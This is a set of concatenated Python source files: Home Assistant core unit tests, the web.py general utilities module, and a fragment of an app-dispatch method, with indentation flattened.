else:
ts = None
utils.log(self.diagnostic, level, message, name, ts)
def register_dashboard(self, dash):
self.dashboard = dash
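# Find the endpoint registered under "name" across all apps and invoke its callback
# in the executor; returns ('', 404) when no matching endpoint is registered.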
async def dispatch_app_by_name(self, name, args):
with self.endpoints_lock:
callback = None
for app in self.endpoints:
for handle in self.endpoints[app]:
if self.endpoints[app][handle]["name"] == name:
callback = self.endpoints[app][handle]["callback"]
if callback is not None:
return await utils.run_in_executor(self.loop, self.executor, callback, args)
else:
return '', 404
|
test_core.py
|
"""Test to verify that Home Assistant core works."""
# pylint: disable=protected-access,too-many-public-methods
# pylint: disable=too-few-public-methods
import os
import signal
import unittest
from unittest.mock import patch
import time
import threading
from datetime import datetime, timedelta
import pytz
import homeassistant.core as ha
from homeassistant.exceptions import (
HomeAssistantError, InvalidEntityFormatError)
import homeassistant.util.dt as dt_util
from homeassistant.const import (
__version__, EVENT_HOMEASSISTANT_START, EVENT_HOMEASSISTANT_STOP,
EVENT_STATE_CHANGED, ATTR_FRIENDLY_NAME, TEMP_CELCIUS,
TEMP_FAHRENHEIT)
from tests.common import get_test_home_assistant
PST = pytz.timezone('America/Los_Angeles')
class TestHomeAssistant(unittest.TestCase):
"""Test the Home Assistant core classes."""
def setUp(self): # pylint: disable=invalid-name
"""Setup things to be run when tests are started."""
self.hass = get_test_home_assistant()
self.hass.states.set("light.Bowl", "on")
self.hass.states.set("switch.AC", "off")
def tearDown(self): # pylint: disable=invalid-name
"""Stop everything that was started."""
try:
self.hass.stop()
except HomeAssistantError:
# Already stopped after the block till stopped test
pass
def test_start(self):
"""Start the test."""
calls = []
self.hass.bus.listen_once(EVENT_HOMEASSISTANT_START,
lambda event: calls.append(1))
self.hass.start()
self.hass.pool.block_till_done()
self.assertEqual(1, len(calls))
# @patch('homeassistant.core.time.sleep')
def test_block_till_stopped(self):
"""Test if we can block till stop service is called."""
with patch('time.sleep'):
blocking_thread = threading.Thread(
target=self.hass.block_till_stopped)
self.assertFalse(blocking_thread.is_alive())
blocking_thread.start()
self.assertTrue(blocking_thread.is_alive())
self.hass.services.call(ha.DOMAIN, ha.SERVICE_HOMEASSISTANT_STOP)
self.hass.pool.block_till_done()
# Wait for thread to stop
for _ in range(20):
if not blocking_thread.is_alive():
break
time.sleep(0.05)
self.assertFalse(blocking_thread.is_alive())
def test_stopping_with_sigterm(self):
"""Test for stopping with sigterm."""
calls = []
self.hass.bus.listen_once(EVENT_HOMEASSISTANT_STOP,
lambda event: calls.append(1))
def send_sigterm(length):
"""Send sigterm."""
os.kill(os.getpid(), signal.SIGTERM)
with patch('homeassistant.core.time.sleep', send_sigterm):
self.hass.block_till_stopped()
self.assertEqual(1, len(calls))
class TestEvent(unittest.TestCase):
"""A Test Event class."""
def test_eq(self):
"""Test events."""
now = dt_util.utcnow()
data = {'some': 'attr'}
event1, event2 = [
ha.Event('some_type', data, time_fired=now)
for _ in range(2)
]
self.assertEqual(event1, event2)
def test_repr(self):
"""Test that repr method works."""
self.assertEqual(
"<Event TestEvent[L]>",
str(ha.Event("TestEvent")))
self.assertEqual(
"<Event TestEvent[R]: beer=nice>",
str(ha.Event("TestEvent",
{"beer": "nice"},
ha.EventOrigin.remote)))
def test_as_dict(self):
"""Test as dictionary."""
event_type = 'some_type'
now = dt_util.utcnow()
data = {'some': 'attr'}
event = ha.Event(event_type, data, ha.EventOrigin.local, now)
expected = {
'event_type': event_type,
'data': data,
'origin': 'LOCAL',
'time_fired': dt_util.datetime_to_str(now),
}
self.assertEqual(expected, event.as_dict())
class TestEventBus(unittest.TestCase):
"""Test EventBus methods."""
def setUp(self): # pylint: disable=invalid-name
"""Setup things to be run when tests are started."""
self.bus = ha.EventBus(ha.create_worker_pool(0))
self.bus.listen('test_event', lambda x: len)
def tearDown(self): # pylint: disable=invalid-name
"""Stop down stuff we started."""
self.bus._pool.stop()
def test_add_remove_listener(self):
"""Test remove_listener method."""
self.bus._pool.add_worker()
old_count = len(self.bus.listeners)
def listener(_): pass
self.bus.listen('test', listener)
self.assertEqual(old_count + 1, len(self.bus.listeners))
# Try deleting a non registered listener, nothing should happen
self.bus.remove_listener('test', lambda x: len)
# Remove listener
self.bus.remove_listener('test', listener)
self.assertEqual(old_count, len(self.bus.listeners))
# Try deleting listener while category doesn't exist either
self.bus.remove_listener('test', listener)
def test_listen_once_event(self):
"""Test listen_once_event method."""
runs = []
self.bus.listen_once('test_event', lambda x: runs.append(1))
self.bus.fire('test_event')
# Second time it should not increase runs
self.bus.fire('test_event')
self.bus._pool.add_worker()
self.bus._pool.block_till_done()
self.assertEqual(1, len(runs))
class TestState(unittest.TestCase):
"""Test State methods."""
def test_init(self):
"""Test state.init."""
self.assertRaises(
InvalidEntityFormatError, ha.State,
'invalid_entity_format', 'test_state')
def test_domain(self):
"""Test domain."""
state = ha.State('some_domain.hello', 'world')
self.assertEqual('some_domain', state.domain)
def test_object_id(self):
"""Test object ID."""
state = ha.State('domain.hello', 'world')
self.assertEqual('hello', state.object_id)
def test_name_if_no_friendly_name_attr(self):
"""Test if there is no friendly name."""
state = ha.State('domain.hello_world', 'world')
self.assertEqual('hello world', state.name)
def test_name_if_friendly_name_attr(self):
"""Test if there is a friendly name."""
name = 'Some Unique Name'
state = ha.State('domain.hello_world', 'world',
{ATTR_FRIENDLY_NAME: name})
self.assertEqual(name, state.name)
def test_dict_conversion(self):
"""Test conversion of dict."""
state = ha.State('domain.hello', 'world', {'some': 'attr'})
self.assertEqual(state, ha.State.from_dict(state.as_dict()))
def test_dict_conversion_with_wrong_data(self):
"""Test conversion with wrong data."""
self.assertIsNone(ha.State.from_dict(None))
self.assertIsNone(ha.State.from_dict({'state': 'yes'}))
self.assertIsNone(ha.State.from_dict({'entity_id': 'yes'}))
def test_repr(self):
"""Test state.repr."""
self.assertEqual("<state happy.happy=on @ 12:00:00 08-12-1984>",
str(ha.State(
"happy.happy", "on",
last_changed=datetime(1984, 12, 8, 12, 0, 0))))
self.assertEqual(
"<state happy.happy=on; brightness=144 @ 12:00:00 08-12-1984>",
str(ha.State("happy.happy", "on", {"brightness": 144},
datetime(1984, 12, 8, 12, 0, 0))))
class TestStateMachine(unittest.TestCase):
"""Test State machine methods."""
def setUp(self): # pylint: disable=invalid-name
"""Setup things to be run when tests are started."""
self.pool = ha.create_worker_pool(0)
self.bus = ha.EventBus(self.pool)
self.states = ha.StateMachine(self.bus)
self.states.set("light.Bowl", "on")
self.states.set("switch.AC", "off")
def tearDown(self): # pylint: disable=invalid-name
"""Stop down stuff we started."""
self.pool.stop()
def test_is_state(self):
"""Test is_state method."""
self.assertTrue(self.states.is_state('light.Bowl', 'on'))
self.assertFalse(self.states.is_state('light.Bowl', 'off'))
self.assertFalse(self.states.is_state('light.Non_existing', 'on'))
def test_is_state_attr(self):
"""Test is_state_attr method."""
self.states.set("light.Bowl", "on", {"brightness": 100})
self.assertTrue(
self.states.is_state_attr('light.Bowl', 'brightness', 100))
self.assertFalse(
self.states.is_state_attr('light.Bowl', 'friendly_name', 200))
self.assertFalse(
self.states.is_state_attr('light.Bowl', 'friendly_name', 'Bowl'))
self.assertFalse(
self.states.is_state_attr('light.Non_existing', 'brightness', 100))
def test_entity_ids(self):
"""Test get_entity_ids method."""
ent_ids = self.states.entity_ids()
self.assertEqual(2, len(ent_ids))
self.assertTrue('light.bowl' in ent_ids)
self.assertTrue('switch.ac' in ent_ids)
ent_ids = self.states.entity_ids('light')
self.assertEqual(1, len(ent_ids))
self.assertTrue('light.bowl' in ent_ids)
def test_all(self):
"""Test everything."""
states = sorted(state.entity_id for state in self.states.all())
self.assertEqual(['light.bowl', 'switch.ac'], states)
def test_remove(self):
"""Test remove method."""
self.pool.add_worker()
events = []
self.bus.listen(EVENT_STATE_CHANGED,
lambda event: events.append(event))
self.assertIn('light.bowl', self.states.entity_ids())
self.assertTrue(self.states.remove('light.bowl'))
self.pool.block_till_done()
self.assertNotIn('light.bowl', self.states.entity_ids())
self.assertEqual(1, len(events))
self.assertEqual('light.bowl', events[0].data.get('entity_id'))
self.assertIsNotNone(events[0].data.get('old_state'))
self.assertEqual('light.bowl', events[0].data['old_state'].entity_id)
self.assertIsNone(events[0].data.get('new_state'))
# If it does not exist, we should get False
self.assertFalse(self.states.remove('light.Bowl'))
self.pool.block_till_done()
self.assertEqual(1, len(events))
def test_case_insensitivity(self):
"""Test case insensitivity."""
self.pool.add_worker()
runs = []
self.bus.listen(EVENT_STATE_CHANGED, lambda event: runs.append(event))
self.states.set('light.BOWL', 'off')
self.bus._pool.block_till_done()
self.assertTrue(self.states.is_state('light.bowl', 'off'))
self.assertEqual(1, len(runs))
def test_last_changed_not_updated_on_same_state(self):
"""Test to not update the existing, same state."""
state = self.states.get('light.Bowl')
future = dt_util.utcnow() + timedelta(hours=10)
with patch('homeassistant.util.dt.utcnow', return_value=future):
self.states.set("light.Bowl", "on", {'attr': 'triggers_change'})
self.assertEqual(state.last_changed,
self.states.get('light.Bowl').last_changed)
class TestServiceCall(unittest.TestCase):
"""Test ServiceCall class."""
def test_repr(self):
"""Test repr method."""
self.assertEqual(
"<ServiceCall homeassistant.start>",
str(ha.ServiceCall('homeassistant', 'start')))
self.assertEqual(
"<ServiceCall homeassistant.start: fast=yes>",
str(ha.ServiceCall('homeassistant', 'start', {"fast": "yes"})))
class TestServiceRegistry(unittest.TestCase):
"""Test ServicerRegistry methods."""
def setUp(self): # pylint: disable=invalid-name
"""Setup things to be run when tests are started."""
self.pool = ha.create_worker_pool(0)
self.bus = ha.EventBus(self.pool)
self.services = ha.ServiceRegistry(self.bus, self.pool)
self.services.register("test_domain", "test_service", lambda x: None)
def tearDown(self): # pylint: disable=invalid-name
"""Stop down stuff we started."""
if self.pool.worker_count:
self.pool.stop()
def test_has_service(self):
"""Test has_service method."""
self.assertTrue(
self.services.has_service("test_domain", "test_service"))
self.assertFalse(
self.services.has_service("test_domain", "non_existing"))
self.assertFalse(
self.services.has_service("non_existing", "test_service"))
def test_services(self):
"""Test services."""
expected = {
'test_domain': {'test_service': {'description': '', 'fields': {}}}
}
self.assertEqual(expected, self.services.services)
def test_call_with_blocking_done_in_time(self):
"""Test call with blocking."""
self.pool.add_worker()
self.pool.add_worker()
calls = []
self.services.register("test_domain", "register_calls",
lambda x: calls.append(1))
self.assertTrue(
self.services.call('test_domain', 'register_calls', blocking=True))
self.assertEqual(1, len(calls))
def test_call_with_blocking_not_done_in_time(self):
"""Test with blocking."""
calls = []
self.services.register("test_domain", "register_calls",
lambda x: calls.append(1))
orig_limit = ha.SERVICE_CALL_LIMIT
ha.SERVICE_CALL_LIMIT = 0.01
self.assertFalse(
self.services.call('test_domain', 'register_calls', blocking=True))
self.assertEqual(0, len(calls))
ha.SERVICE_CALL_LIMIT = orig_limit
def test_call_non_existing_with_blocking(self):
"""Test non-existing with blocking."""
self.pool.add_worker()
self.pool.add_worker()
orig_limit = ha.SERVICE_CALL_LIMIT
ha.SERVICE_CALL_LIMIT = 0.01
self.assertFalse(
self.services.call('test_domain', 'i_do_not_exist', blocking=True))
ha.SERVICE_CALL_LIMIT = orig_limit
class TestConfig(unittest.TestCase):
"""Test configuration methods."""
def setUp(self): # pylint: disable=invalid-name
"""Setup things to be run when tests are started."""
self.config = ha.Config()
def test_config_dir_set_correct(self):
"""Test config dir set correct."""
data_dir = os.getenv('APPDATA') if os.name == "nt" \
else os.path.expanduser('~')
self.assertEqual(os.path.join(data_dir, ".homeassistant"),
self.config.config_dir)
def test_path_with_file(self):
"""Test get_config_path method."""
data_dir = os.getenv('APPDATA') if os.name == "nt" \
else os.path.expanduser('~')
self.assertEqual(os.path.join(data_dir, ".homeassistant", "test.conf"),
self.config.path("test.conf"))
def test_path_with_dir_and_file(self):
"""Test get_config_path method."""
data_dir = os.getenv('APPDATA') if os.name == "nt" \
else os.path.expanduser('~')
self.assertEqual(
os.path.join(data_dir, ".homeassistant", "dir", "test.conf"),
self.config.path("dir", "test.conf"))
def test_temperature_not_convert_if_no_preference(self):
"""No unit conversion to happen if no preference."""
self.assertEqual(
(25, TEMP_CELCIUS),
self.config.temperature(25, TEMP_CELCIUS))
self.assertEqual(
(80, TEMP_FAHRENHEIT),
self.config.temperature(80, TEMP_FAHRENHEIT))
def test_temperature_not_convert_if_invalid_value(self):
"""No unit conversion to happen if no preference."""
self.config.temperature_unit = TEMP_FAHRENHEIT
self.assertEqual(
('25a', TEMP_CELCIUS),
self.config.temperature('25a', TEMP_CELCIUS))
def test_temperature_not_convert_if_invalid_unit(self):
"""No unit conversion to happen if no preference."""
self.assertEqual(
(25, 'Invalid unit'),
self.config.temperature(25, 'Invalid unit'))
def test_temperature_to_convert_to_celcius(self):
"""Test temperature conversion to celsius."""
self.config.temperature_unit = TEMP_CELCIUS
self.assertEqual(
(25, TEMP_CELCIUS),
self.config.temperature(25, TEMP_CELCIUS))
self.assertEqual(
(26.7, TEMP_CELCIUS),
self.config.temperature(80, TEMP_FAHRENHEIT))
def test_temperature_to_convert_to_fahrenheit(self):
"""Test temperature conversion to fahrenheit."""
self.config.temperature_unit = TEMP_FAHRENHEIT
self.assertEqual(
(77, TEMP_FAHRENHEIT),
self.config.temperature(25, TEMP_CELCIUS))
self.assertEqual(
(80, TEMP_FAHRENHEIT),
self.config.temperature(80, TEMP_FAHRENHEIT))
def test_as_dict(self):
"""Test as dict."""
expected = {
'latitude': None,
'longitude': None,
'temperature_unit': None,
'location_name': None,
'time_zone': 'UTC',
'components': [],
'version': __version__,
}
self.assertEqual(expected, self.config.as_dict())
class TestWorkerPool(unittest.TestCase):
"""Test WorkerPool methods."""
def test_exception_during_job(self):
"""Test exception during a job."""
pool = ha.create_worker_pool(1)
def malicious_job(_):
raise Exception("Test breaking worker pool")
calls = []
def register_call(_):
calls.append(1)
pool.add_job(ha.JobPriority.EVENT_DEFAULT, (malicious_job, None))
pool.add_job(ha.JobPriority.EVENT_DEFAULT, (register_call, None))
pool.block_till_done()
self.assertEqual(1, len(calls))
|
utils.py
|
#!/usr/bin/env python
"""
General Utilities
(part of web.py)
"""
__all__ = [
"Storage", "storage", "storify",
"Counter", "counter",
"iters",
"rstrips", "lstrips", "strips",
"safeunicode", "safestr", "utf8",
"TimeoutError", "timelimit",
"Memoize", "memoize",
"re_compile", "re_subm",
"group", "uniq", "iterview",
"IterBetter", "iterbetter",
"safeiter", "safewrite",
"dictreverse", "dictfind", "dictfindall", "dictincr", "dictadd",
"requeue", "restack",
"listget", "intget", "datestr",
"numify", "denumify", "commify", "dateify",
"nthstr", "cond",
"CaptureStdout", "capturestdout", "Profile", "profile",
"tryall",
"ThreadedDict", "threadeddict",
"autoassign",
"to36",
"safemarkdown",
"sendmail"
]
import re, sys, time, threading, itertools, traceback, os
try:
import subprocess
except ImportError:
subprocess = None
try: import datetime
except ImportError: pass
try: set
except NameError:
from sets import Set as set
try:
from threading import local as threadlocal
except ImportError:
from python23 import threadlocal
class Storage(dict):
"""
A Storage object is like a dictionary except `obj.foo` can be used
in addition to `obj['foo']`.
>>> o = storage(a=1)
>>> o.a
1
>>> o['a']
1
>>> o.a = 2
>>> o['a']
2
>>> del o.a
>>> o.a
Traceback (most recent call last):
...
AttributeError: 'a'
"""
def __getattr__(self, key):
try:
return self[key]
except KeyError, k:
raise AttributeError, k
def __setattr__(self, key, value):
self[key] = value
def __delattr__(self, key):
try:
del self[key]
except KeyError, k:
raise AttributeError, k
def __repr__(self):
return '<Storage ' + dict.__repr__(self) + '>'
storage = Storage
def storify(mapping, *requireds, **defaults):
"""
Creates a `storage` object from dictionary `mapping`, raising `KeyError` if
    `mapping` doesn't have all of the keys in `requireds` and using the default
values for keys found in `defaults`.
For example, `storify({'a':1, 'c':3}, b=2, c=0)` will return the equivalent of
`storage({'a':1, 'b':2, 'c':3})`.
If a `storify` value is a list (e.g. multiple values in a form submission),
`storify` returns the last element of the list, unless the key appears in
`defaults` as a list. Thus:
>>> storify({'a':[1, 2]}).a
2
>>> storify({'a':[1, 2]}, a=[]).a
[1, 2]
>>> storify({'a':1}, a=[]).a
[1]
>>> storify({}, a=[]).a
[]
    Similarly, if the value has a `value` attribute, `storify` will return _its_
value, unless the key appears in `defaults` as a dictionary.
>>> storify({'a':storage(value=1)}).a
1
>>> storify({'a':storage(value=1)}, a={}).a
<Storage {'value': 1}>
>>> storify({}, a={}).a
{}
Optionally, keyword parameter `_unicode` can be passed to convert all values to unicode.
>>> storify({'x': 'a'}, _unicode=True)
<Storage {'x': u'a'}>
>>> storify({'x': storage(value='a')}, x={}, _unicode=True)
<Storage {'x': <Storage {'value': 'a'}>}>
>>> storify({'x': storage(value='a')}, _unicode=True)
<Storage {'x': u'a'}>
"""
_unicode = defaults.pop('_unicode', False)
def unicodify(s):
if _unicode and isinstance(s, str): return safeunicode(s)
else: return s
def getvalue(x):
if hasattr(x, 'file') and hasattr(x, 'value'):
return x.value
elif hasattr(x, 'value'):
return unicodify(x.value)
else:
return unicodify(x)
stor = Storage()
for key in requireds + tuple(mapping.keys()):
value = mapping[key]
if isinstance(value, list):
if isinstance(defaults.get(key), list):
value = [getvalue(x) for x in value]
else:
value = value[-1]
if not isinstance(defaults.get(key), dict):
value = getvalue(value)
if isinstance(defaults.get(key), list) and not isinstance(value, list):
value = [value]
setattr(stor, key, value)
for (key, value) in defaults.iteritems():
result = value
if hasattr(stor, key):
result = stor[key]
if value == () and not isinstance(result, tuple):
result = (result,)
setattr(stor, key, result)
return stor
class Counter(storage):
"""Keeps count of how many times something is added.
>>> c = counter()
>>> c.add('x')
>>> c.add('x')
>>> c.add('x')
>>> c.add('x')
>>> c.add('x')
>>> c.add('y')
>>> c
<Counter {'y': 1, 'x': 5}>
>>> c.most()
['x']
"""
def add(self, n):
self.setdefault(n, 0)
self[n] += 1
def most(self):
"""Returns the keys with maximum count."""
m = max(self.itervalues())
return [k for k, v in self.iteritems() if v == m]
def least(self):
"""Returns the keys with mininum count."""
m = min(self.itervalues())
return [k for k, v in self.iteritems() if v == m]
def percent(self, key):
"""Returns what percentage a certain key is of all entries.
>>> c = counter()
>>> c.add('x')
>>> c.add('x')
>>> c.add('x')
>>> c.add('y')
>>> c.percent('x')
0.75
>>> c.percent('y')
0.25
"""
return float(self[key])/sum(self.values())
def sorted_keys(self):
"""Returns keys sorted by value.
>>> c = counter()
>>> c.add('x')
>>> c.add('x')
>>> c.add('y')
>>> c.sorted_keys()
['x', 'y']
"""
return sorted(self.keys(), key=lambda k: self[k], reverse=True)
def sorted_values(self):
"""Returns values sorted by value.
>>> c = counter()
>>> c.add('x')
>>> c.add('x')
>>> c.add('y')
>>> c.sorted_values()
[2, 1]
"""
return [self[k] for k in self.sorted_keys()]
def sorted_items(self):
"""Returns items sorted by value.
>>> c = counter()
>>> c.add('x')
>>> c.add('x')
>>> c.add('y')
>>> c.sorted_items()
[('x', 2), ('y', 1)]
"""
return [(k, self[k]) for k in self.sorted_keys()]
def __repr__(self):
return '<Counter ' + dict.__repr__(self) + '>'
counter = Counter
iters = [list, tuple]
import __builtin__
if hasattr(__builtin__, 'set'):
iters.append(set)
if hasattr(__builtin__, 'frozenset'):
    iters.append(frozenset)
if sys.version_info < (2,6): # sets module deprecated in 2.6
try:
from sets import Set
iters.append(Set)
except ImportError:
pass
class _hack(tuple): pass
iters = _hack(iters)
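# _hack subclasses tuple only so that a __doc__ attribute can be attached to the
# instance below; plain tuple instances do not allow attribute assignment.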
iters.__doc__ = """
A list of iterable items (like lists, but not strings). Includes whichever
of lists, tuples, sets, and Sets are available in this version of Python.
"""
def _strips(direction, text, remove):
if direction == 'l':
if text.startswith(remove):
return text[len(remove):]
elif direction == 'r':
if text.endswith(remove):
return text[:-len(remove)]
else:
raise ValueError, "Direction needs to be r or l."
return text
def rstrips(text, remove):
"""
removes the string `remove` from the right of `text`
>>> rstrips("foobar", "bar")
'foo'
"""
return _strips('r', text, remove)
def lstrips(text, remove):
"""
removes the string `remove` from the left of `text`
>>> lstrips("foobar", "foo")
'bar'
"""
return _strips('l', text, remove)
def strips(text, remove):
"""
    removes the string `remove` from both sides of `text`
>>> strips("foobarfoo", "foo")
'bar'
"""
return rstrips(lstrips(text, remove), remove)
def safeunicode(obj, encoding='utf-8'):
r"""
Converts any given object to unicode string.
>>> safeunicode('hello')
u'hello'
>>> safeunicode(2)
u'2'
>>> safeunicode('\xe1\x88\xb4')
u'\u1234'
"""
t = type(obj)
if t is unicode:
return obj
elif t is str:
return obj.decode(encoding)
elif t in [int, float, bool]:
return unicode(obj)
elif hasattr(obj, '__unicode__') or isinstance(obj, unicode):
return unicode(obj)
else:
return str(obj).decode(encoding)
def safestr(obj, encoding='utf-8'):
r"""
Converts any given object to utf-8 encoded string.
>>> safestr('hello')
'hello'
>>> safestr(u'\u1234')
'\xe1\x88\xb4'
>>> safestr(2)
'2'
"""
if isinstance(obj, unicode):
return obj.encode(encoding)
elif isinstance(obj, str):
return obj
elif hasattr(obj, 'next') and hasattr(obj, '__iter__'): # iterator
return itertools.imap(safestr, obj)
else:
return str(obj)
# for backward-compatibility
utf8 = safestr
class TimeoutError(Exception): pass
def timelimit(timeout):
"""
A decorator to limit a function to `timeout` seconds, raising `TimeoutError`
if it takes longer.
>>> import time
>>> def meaningoflife():
... time.sleep(.2)
... return 42
>>>
>>> timelimit(.1)(meaningoflife)()
Traceback (most recent call last):
...
TimeoutError: took too long
>>> timelimit(1)(meaningoflife)()
42
_Caveat:_ The function isn't stopped after `timeout` seconds but continues
executing in a separate thread. (There seems to be no way to kill a thread.)
inspired by <http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/473878>
"""
def _1(function):
def _2(*args, **kw):
class Dispatch(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.result = None
self.error = None
self.setDaemon(True)
self.start()
def run(self):
try:
self.result = function(*args, **kw)
except:
self.error = sys.exc_info()
c = Dispatch()
c.join(timeout)
if c.isAlive():
raise TimeoutError, 'took too long'
if c.error:
raise c.error[0], c.error[1]
return c.result
return _2
return _1
class Memoize:
"""
'Memoizes' a function, caching its return values for each input.
If `expires` is specified, values are recalculated after `expires` seconds.
If `background` is specified, values are recalculated in a separate thread.
>>> calls = 0
>>> def howmanytimeshaveibeencalled():
... global calls
... calls += 1
... return calls
>>> fastcalls = memoize(howmanytimeshaveibeencalled)
>>> howmanytimeshaveibeencalled()
1
>>> howmanytimeshaveibeencalled()
2
>>> fastcalls()
3
>>> fastcalls()
3
>>> import time
>>> fastcalls = memoize(howmanytimeshaveibeencalled, .1, background=False)
>>> fastcalls()
4
>>> fastcalls()
4
>>> time.sleep(.2)
>>> fastcalls()
5
>>> def slowfunc():
... time.sleep(.1)
... return howmanytimeshaveibeencalled()
>>> fastcalls = memoize(slowfunc, .2, background=True)
>>> fastcalls()
6
>>> timelimit(.05)(fastcalls)()
6
>>> time.sleep(.2)
>>> timelimit(.05)(fastcalls)()
6
>>> timelimit(.05)(fastcalls)()
6
>>> time.sleep(.2)
>>> timelimit(.05)(fastcalls)()
7
>>> fastcalls = memoize(slowfunc, None, background=True)
>>> threading.Thread(target=fastcalls).start()
>>> time.sleep(.01)
>>> fastcalls()
9
"""
def __init__(self, func, expires=None, background=True):
self.func = func
self.cache = {}
self.expires = expires
self.background = background
self.running = {}
def __call__(self, *args, **keywords):
key = (args, tuple(keywords.items()))
if not self.running.get(key):
self.running[key] = threading.Lock()
def update(block=False):
if self.running[key].acquire(block):
try:
self.cache[key] = (self.func(*args, **keywords), time.time())
finally:
self.running[key].release()
if key not in self.cache:
update(block=True)
elif self.expires and (time.time() - self.cache[key][1]) > self.expires:
if self.background:
threading.Thread(target=update).start()
else:
update()
return self.cache[key][0]
memoize = Memoize
re_compile = memoize(re.compile) #@@ threadsafe?
re_compile.__doc__ = """
A memoized version of re.compile.
"""
class _re_subm_proxy:
def __init__(self):
self.match = None
def __call__(self, match):
self.match = match
return ''
def re_subm(pat, repl, string):
"""
Like re.sub, but returns the replacement _and_ the match object.
>>> t, m = re_subm('g(oo+)fball', r'f\\1lish', 'goooooofball')
>>> t
'foooooolish'
>>> m.groups()
('oooooo',)
"""
compiled_pat = re_compile(pat)
proxy = _re_subm_proxy()
compiled_pat.sub(proxy.__call__, string)
return compiled_pat.sub(repl, string), proxy.match
def group(seq, size):
"""
    Returns an iterator over a series of lists of length `size` from the iterable `seq`.
>>> list(group([1,2,3,4], 2))
[[1, 2], [3, 4]]
>>> list(group([1,2,3,4,5], 2))
[[1, 2], [3, 4], [5]]
"""
def take(seq, n):
for i in xrange(n):
yield seq.next()
if not hasattr(seq, 'next'):
seq = iter(seq)
while True:
x = list(take(seq, size))
if x:
yield x
else:
break
def uniq(seq, key=None):
"""
Removes duplicate elements from a list while preserving the order of the rest.
>>> uniq([9,0,2,1,0])
[9, 0, 2, 1]
The value of the optional `key` parameter should be a function that
takes a single argument and returns a key to test the uniqueness.
>>> uniq(["Foo", "foo", "bar"], key=lambda s: s.lower())
['Foo', 'bar']
"""
key = key or (lambda x: x)
seen = set()
result = []
for v in seq:
k = key(v)
if k in seen:
continue
seen.add(k)
result.append(v)
return result
def iterview(x):
"""
Takes an iterable `x` and returns an iterator over it
which prints its progress to stderr as it iterates through.
"""
WIDTH = 70
def plainformat(n, lenx):
return '%5.1f%% (%*d/%d)' % ((float(n)/lenx)*100, len(str(lenx)), n, lenx)
def bars(size, n, lenx):
val = int((float(n)*size)/lenx + 0.5)
if size - val:
spacing = ">" + (" "*(size-val))[1:]
else:
spacing = ""
return "[%s%s]" % ("="*val, spacing)
def eta(elapsed, n, lenx):
if n == 0:
return '--:--:--'
if n == lenx:
secs = int(elapsed)
else:
secs = int((elapsed/n) * (lenx-n))
mins, secs = divmod(secs, 60)
hrs, mins = divmod(mins, 60)
return '%02d:%02d:%02d' % (hrs, mins, secs)
def format(starttime, n, lenx):
out = plainformat(n, lenx) + ' '
if n == lenx:
end = ' '
else:
end = ' ETA '
end += eta(time.time() - starttime, n, lenx)
out += bars(WIDTH - len(out) - len(end), n, lenx)
out += end
return out
starttime = time.time()
lenx = len(x)
for n, y in enumerate(x):
sys.stderr.write('\r' + format(starttime, n, lenx))
yield y
sys.stderr.write('\r' + format(starttime, n+1, lenx) + '\n')
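# Illustrative usage of iterview (a sketch, not part of the original module;
# `records` and `process` are hypothetical names):
#
#   for record in iterview(records):
#       process(record)
#
# Note that iterview calls len() on its argument, so plain generators need to be
# materialised (e.g. into a list) before being wrapped.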
class IterBetter:
"""
Returns an object that can be used as an iterator
but can also be used via __getitem__ (although it
cannot go backwards -- that is, you cannot request
`iterbetter[0]` after requesting `iterbetter[1]`).
>>> import itertools
>>> c = iterbetter(itertools.count())
>>> c[1]
1
>>> c[5]
5
>>> c[3]
Traceback (most recent call last):
...
IndexError: already passed 3
    For boolean tests, IterBetter peeks at the first value of the iterator without affecting the iteration.
>>> c = iterbetter(iter(range(5)))
>>> bool(c)
True
>>> list(c)
[0, 1, 2, 3, 4]
>>> c = iterbetter(iter([]))
>>> bool(c)
False
>>> list(c)
[]
"""
def __init__(self, iterator):
self.i, self.c = iterator, 0
def __iter__(self):
if hasattr(self, "_head"):
yield self._head
while 1:
yield self.i.next()
self.c += 1
def __getitem__(self, i):
#todo: slices
if i < self.c:
raise IndexError, "already passed "+str(i)
try:
while i > self.c:
self.i.next()
self.c += 1
# now self.c == i
self.c += 1
return self.i.next()
except StopIteration:
raise IndexError, str(i)
def __nonzero__(self):
if hasattr(self, "__len__"):
return len(self) != 0
elif hasattr(self, "_head"):
return True
else:
try:
self._head = self.i.next()
except StopIteration:
return False
else:
return True
iterbetter = IterBetter
def safeiter(it, cleanup=None, ignore_errors=True):
"""Makes an iterator safe by ignoring the exceptions occured during the iteration.
"""
def next():
while True:
try:
return it.next()
except StopIteration:
raise
except:
traceback.print_exc()
it = iter(it)
while True:
yield next()
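# Illustrative usage of safeiter (a sketch; `flaky_rows` is a hypothetical iterator
# whose next() may raise for some items):
#
#   for row in safeiter(flaky_rows):
#       handle(row)   # rows whose retrieval raised are skipped, with a traceback printed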
def safewrite(filename, content):
"""Writes the content to a temp file and then moves the temp file to
given filename to avoid overwriting the existing file in case of errors.
"""
f = file(filename + '.tmp', 'w')
f.write(content)
f.close()
    os.rename(f.name, filename)
def dictreverse(mapping):
"""
Returns a new dictionary with keys and values swapped.
>>> dictreverse({1: 2, 3: 4})
{2: 1, 4: 3}
"""
return dict([(value, key) for (key, value) in mapping.iteritems()])
def dictfind(dictionary, element):
"""
Returns a key whose value in `dictionary` is `element`
or, if none exists, None.
>>> d = {1:2, 3:4}
>>> dictfind(d, 4)
3
>>> dictfind(d, 5)
"""
for (key, value) in dictionary.iteritems():
if element is value:
return key
def dictfindall(dictionary, element):
"""
Returns the keys whose values in `dictionary` are `element`
or, if none exists, [].
>>> d = {1:4, 3:4}
>>> dictfindall(d, 4)
[1, 3]
>>> dictfindall(d, 5)
[]
"""
res = []
for (key, value) in dictionary.iteritems():
if element is value:
res.append(key)
return res
def dictincr(dictionary, element):
"""
Increments `element` in `dictionary`,
setting it to one if it doesn't exist.
>>> d = {1:2, 3:4}
>>> dictincr(d, 1)
3
>>> d[1]
3
>>> dictincr(d, 5)
1
>>> d[5]
1
"""
dictionary.setdefault(element, 0)
dictionary[element] += 1
return dictionary[element]
def dictadd(*dicts):
"""
Returns a dictionary consisting of the keys in the argument dictionaries.
If they share a key, the value from the last argument is used.
>>> dictadd({1: 0, 2: 0}, {2: 1, 3: 1})
{1: 0, 2: 1, 3: 1}
"""
result = {}
for dct in dicts:
result.update(dct)
return result
def requeue(queue, index=-1):
"""Returns the element at index after moving it to the beginning of the queue.
>>> x = [1, 2, 3, 4]
>>> requeue(x)
4
>>> x
[4, 1, 2, 3]
"""
x = queue.pop(index)
queue.insert(0, x)
return x
